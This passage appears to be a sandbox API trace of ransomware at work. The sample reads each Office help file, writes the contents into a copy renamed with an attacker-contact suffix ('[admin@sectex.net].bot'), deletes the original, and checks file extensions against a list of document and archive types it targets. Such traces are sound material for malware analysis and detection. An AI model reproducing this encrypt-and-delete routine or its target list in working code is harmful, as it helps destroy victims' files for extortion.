	[0147.641] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.641] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.642] GetLastError () returned 0x0
	[0147.642] ReadFile (in: hFile=0x3c8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x290, lpOverlapped=0x0) returned 1
	[0147.716] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x2a0, lpOverlapped=0x0) returned 1
	[0147.717] ReadFile (in: hFile=0x3c8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.717] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0147.717] SetEndOfFile (hFile=0x3bc) returned 1
	[0147.717] CloseHandle (hObject=0x3bc) returned 1
	[0147.717] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.718] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.719] CloseHandle (hObject=0x3c8) returned 1
	[0147.720] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.720] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxc")) returned 1
	[0147.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.720] lstrlenW (lpString=".doc") returned 4
	[0147.720] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0147.720] lstrlenW (lpString=".docx") returned 5
	[0147.720] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0147.720] lstrlenW (lpString=".pdf") returned 4
	[0147.720] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0147.721] lstrlenW (lpString=".xls") returned 4
	[0147.721] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0147.721] lstrlenW (lpString=".xlsx") returned 5
	[0147.721] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0147.721] lstrlenW (lpString=".ppt") returned 4
	[0147.721] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0147.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.721] lstrlenW (lpString=".zip") returned 4
	[0147.721] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0147.721] lstrlenW (lpString=".rar") returned 4
	[0147.721] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0147.721] lstrlenW (lpString=".bz2") returned 4
	[0147.721] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0147.721] lstrlenW (lpString=".7z") returned 3
	[0147.721] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0147.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.721] lstrlenW (lpString=".dbf") returned 4
	[0147.721] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0147.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.721] lstrlenW (lpString=".1cd") returned 4
	[0147.721] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0147.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.721] lstrlenW (lpString=".jpg") returned 4
	[0147.721] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0147.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.721] lstrlenW (lpString=".doc") returned 4
	[0147.721] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0147.721] lstrlenW (lpString=".docx") returned 5
	[0147.721] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0147.722] lstrlenW (lpString=".pdf") returned 4
	[0147.722] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0147.722] lstrlenW (lpString=".xls") returned 4
	[0147.722] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0147.722] lstrlenW (lpString=".xlsx") returned 5
	[0147.722] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0147.722] lstrlenW (lpString=".ppt") returned 4
	[0147.722] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0147.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.722] lstrlenW (lpString=".zip") returned 4
	[0147.722] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0147.722] lstrlenW (lpString=".rar") returned 4
	[0147.722] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0147.722] lstrlenW (lpString=".bz2") returned 4
	[0147.722] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0147.722] lstrlenW (lpString=".7z") returned 3
	[0147.722] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0147.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.722] lstrlenW (lpString=".dbf") returned 4
	[0147.722] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0147.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.722] lstrlenW (lpString=".1cd") returned 4
	[0147.722] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0147.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC") returned 68
	[0147.722] lstrlenW (lpString=".jpg") returned 4
	[0147.722] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0147.722] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0147.723] lstrlenW (lpString="MSACCESS_COL.HXT") returned 16
	[0147.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.723] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=208) returned 1
	[0147.723] CloseHandle (hObject=0x3c8) returned 1
	[0147.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxt")) returned 0x20
	[0147.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.724] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.724] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.724] GetLastError () returned 0x0
	[0147.725] ReadFile (in: hFile=0x3c8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xd0, lpOverlapped=0x0) returned 1
	[0147.725] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0147.726] ReadFile (in: hFile=0x3c8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.726] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0147.726] SetEndOfFile (hFile=0x3bc) returned 1
	[0147.726] CloseHandle (hObject=0x3bc) returned 1
	[0147.727] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.727] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.729] CloseHandle (hObject=0x3c8) returned 1
	[0147.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.729] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxt")) returned 1
	[0147.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.730] lstrlenW (lpString=".doc") returned 4
	[0147.730] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0147.730] lstrlenW (lpString=".docx") returned 5
	[0147.730] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0147.730] lstrlenW (lpString=".pdf") returned 4
	[0147.730] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0147.730] lstrlenW (lpString=".xls") returned 4
	[0147.730] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0147.730] lstrlenW (lpString=".xlsx") returned 5
	[0147.730] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0147.730] lstrlenW (lpString=".ppt") returned 4
	[0147.730] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0147.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.730] lstrlenW (lpString=".zip") returned 4
	[0147.730] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0147.730] lstrlenW (lpString=".rar") returned 4
	[0147.730] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0147.730] lstrlenW (lpString=".bz2") returned 4
	[0147.730] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0147.730] lstrlenW (lpString=".7z") returned 3
	[0147.730] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0147.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.731] lstrlenW (lpString=".dbf") returned 4
	[0147.731] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0147.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.731] lstrlenW (lpString=".1cd") returned 4
	[0147.731] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0147.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.731] lstrlenW (lpString=".jpg") returned 4
	[0147.731] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0147.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.731] lstrlenW (lpString=".doc") returned 4
	[0147.731] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0147.731] lstrlenW (lpString=".docx") returned 5
	[0147.731] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0147.731] lstrlenW (lpString=".pdf") returned 4
	[0147.731] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0147.731] lstrlenW (lpString=".xls") returned 4
	[0147.731] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0147.731] lstrlenW (lpString=".xlsx") returned 5
	[0147.731] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0147.731] lstrlenW (lpString=".ppt") returned 4
	[0147.731] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0147.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.731] lstrlenW (lpString=".zip") returned 4
	[0147.731] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0147.731] lstrlenW (lpString=".rar") returned 4
	[0147.731] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0147.731] lstrlenW (lpString=".bz2") returned 4
	[0147.731] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0147.731] lstrlenW (lpString=".7z") returned 3
	[0147.731] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0147.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.732] lstrlenW (lpString=".dbf") returned 4
	[0147.732] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0147.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.732] lstrlenW (lpString=".1cd") returned 4
	[0147.732] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0147.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT") returned 64
	[0147.732] lstrlenW (lpString=".jpg") returned 4
	[0147.732] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0147.732] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0147.732] lstrlenW (lpString="MSACCESS_F_COL.HXK") returned 18
	[0147.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.732] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=114) returned 1
	[0147.732] CloseHandle (hObject=0x3c8) returned 1
	[0147.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_f_col.hxk")) returned 0x20
	[0147.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.733] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.733] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.734] GetLastError () returned 0x0
	[0147.734] ReadFile (in: hFile=0x3c8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x72, lpOverlapped=0x0) returned 1
	[0147.735] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0147.735] ReadFile (in: hFile=0x3c8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.735] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0147.736] SetEndOfFile (hFile=0x3bc) returned 1
	[0147.736] CloseHandle (hObject=0x3bc) returned 1
	[0147.736] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.736] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.738] CloseHandle (hObject=0x3c8) returned 1
	[0147.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.738] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_f_col.hxk")) returned 1
	[0147.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.739] lstrlenW (lpString=".doc") returned 4
	[0147.739] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.739] lstrlenW (lpString=".docx") returned 5
	[0147.739] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.739] lstrlenW (lpString=".pdf") returned 4
	[0147.739] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.739] lstrlenW (lpString=".xls") returned 4
	[0147.739] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.739] lstrlenW (lpString=".xlsx") returned 5
	[0147.739] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.739] lstrlenW (lpString=".ppt") returned 4
	[0147.739] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.740] lstrlenW (lpString=".zip") returned 4
	[0147.740] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.740] lstrlenW (lpString=".rar") returned 4
	[0147.740] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.740] lstrlenW (lpString=".bz2") returned 4
	[0147.740] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.740] lstrlenW (lpString=".7z") returned 3
	[0147.740] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.740] lstrlenW (lpString=".dbf") returned 4
	[0147.740] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.740] lstrlenW (lpString=".1cd") returned 4
	[0147.740] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.740] lstrlenW (lpString=".jpg") returned 4
	[0147.740] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.740] lstrlenW (lpString=".doc") returned 4
	[0147.740] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.740] lstrlenW (lpString=".docx") returned 5
	[0147.740] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.740] lstrlenW (lpString=".pdf") returned 4
	[0147.740] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.740] lstrlenW (lpString=".xls") returned 4
	[0147.740] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.740] lstrlenW (lpString=".xlsx") returned 5
	[0147.740] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.740] lstrlenW (lpString=".ppt") returned 4
	[0147.741] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.741] lstrlenW (lpString=".zip") returned 4
	[0147.741] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.741] lstrlenW (lpString=".rar") returned 4
	[0147.741] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.741] lstrlenW (lpString=".bz2") returned 4
	[0147.741] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.741] lstrlenW (lpString=".7z") returned 3
	[0147.741] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.741] lstrlenW (lpString=".dbf") returned 4
	[0147.741] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.741] lstrlenW (lpString=".1cd") returned 4
	[0147.741] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK") returned 66
	[0147.741] lstrlenW (lpString=".jpg") returned 4
	[0147.741] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.741] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0147.741] lstrlenW (lpString="MSACCESS_K_COL.HXK") returned 18
	[0147.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.742] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=113) returned 1
	[0147.742] CloseHandle (hObject=0x3c8) returned 1
	[0147.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_k_col.hxk")) returned 0x20
	[0147.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.745] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
